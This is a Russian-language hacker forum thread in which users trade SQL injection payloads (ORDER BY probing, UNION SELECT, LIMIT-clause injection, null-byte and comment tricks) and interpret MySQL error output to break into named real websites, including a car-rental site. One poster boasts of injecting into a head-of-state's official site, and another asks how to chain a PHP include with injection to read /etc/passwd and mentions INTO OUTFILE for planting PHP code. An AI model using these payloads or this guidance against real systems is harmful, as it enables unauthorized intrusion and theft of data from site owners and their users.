ZAMUT, все то же самое: Code: '+order+by+1+--+ И вот чуток похожая тема, с такими же SQLi'ями: http://forum.antichat.ru/thread51680.html
Плюнул: Code: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+blablabla+from+hekbla--+) AND `id` IN (SELECT `nid` FROM `node__acc' at line 1
Code: Внутренняя ошибка SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')+order+by+1) AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `' at line 1
мм, попробуй тогда: http://www.site.ru/11/15)+order+by+1%00 если неполочится попробуй http://www.site.ru/11/15')+order+by+1%00 я чет с просони не совсем понял нужна кавычка или нет Еще не понял, почему в запрос + идут, вобщем кидай в ЛС сайт, попробую помочь
там не нужна ковычка, а запрос который дал я не выполнится, ибо нет колонки blablabla и таблицы hekbla не существует
кавычка там действительно не нужна, посмотрел на реальном примере, да и вобще там фигня какая то, в запрос вставляется судя по ошибкам но не выполняется, вобще там плюсов не должно быть в ошибке поидее даже http://www.site.ru/11/15-1 не выполняется
Парни, что за на*уй: HTML: http://bghotelite.com/rent-a-car.php?grad=bg&page=45' ??? Не могу далее ничего сделать...
http://bghotelite.com/rent-a-car.php?grad=bg&page=45/* ну и дальше перебираем количества полей с помощью UNION SELECT 1,2,3... и тд... Иньекция в лимите возможна и очень легко проводима... другой вопрос в лимите ли она... но судя по всему в лимите
давай на 10 рублей поспорим? Вот скажи есть такой запрос Code: SELECT bla1,bla2 FROM bla LIMIT 1,[inject] что тебе мешает достроить запрос до такого: Code: SELECT bla1,bla2 FROM bla LIMIT 1,0 UNION SELECT 1,2
Дошел до 20 и дальше уже в лом По непонятным мне причинам я наехал сегодня на БГ Выложил в SQL-INJ скулю в официальном сайте президента БГ. Сам не знаю, что на меня нашло =)))
Начальная страница - первый параметр )))) А второй по сколько выводим, а такое вот: limit 0/* - нифига не пашет
Спасибо большое что сказал насчет первого параметра если б не ты ... Я привел пример... ну подумаешь в данном случае пример запроса изменится Code: SELECT bla1,bla2 FROM bla LIMIT [inject],10 ничего собственно не меняется: Code: SELECT bla1,bla2 FROM bla LIMIT 0 UNION SELECT 1,2/*,10 ЗЫ пжлст пиши понятней а то с 3-его раза врубился в то что ты хотел сказать... пашет: http://bghotelite.com/rent-a-car.php?grad=bg&page=0/*
Кстати как вариант перед лимитом там может стоять ORDER BY что не дает тебе возможность юзать юнион...
Так обычно и бывает, в limit невозможно использовать выражения, возможно только Into outfile вставить (я про слу чай когда order by используется), еслиб можно постить какието вещи типа в название записать строчку пхп кода, которая комманды позволяет использовать тогда да, но при этом кавычки не должны экранироваться и есть файл прмв, но такое еще реже
SQL + PHP injection ? У меня вопрос. Попалась такая ошибочка: Warning: main(): Failed opening '4' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /bla/www/site.com/main.php on line 290 Это PHP инклюд, да? Как составить запрос, чтобы прочитать /etc/passwd? SQL-INJECTION у меня такая: HTML: http://www.site.com/main.php?id=1+UNION+SELECT+1,2,3,4,5,6,7/*
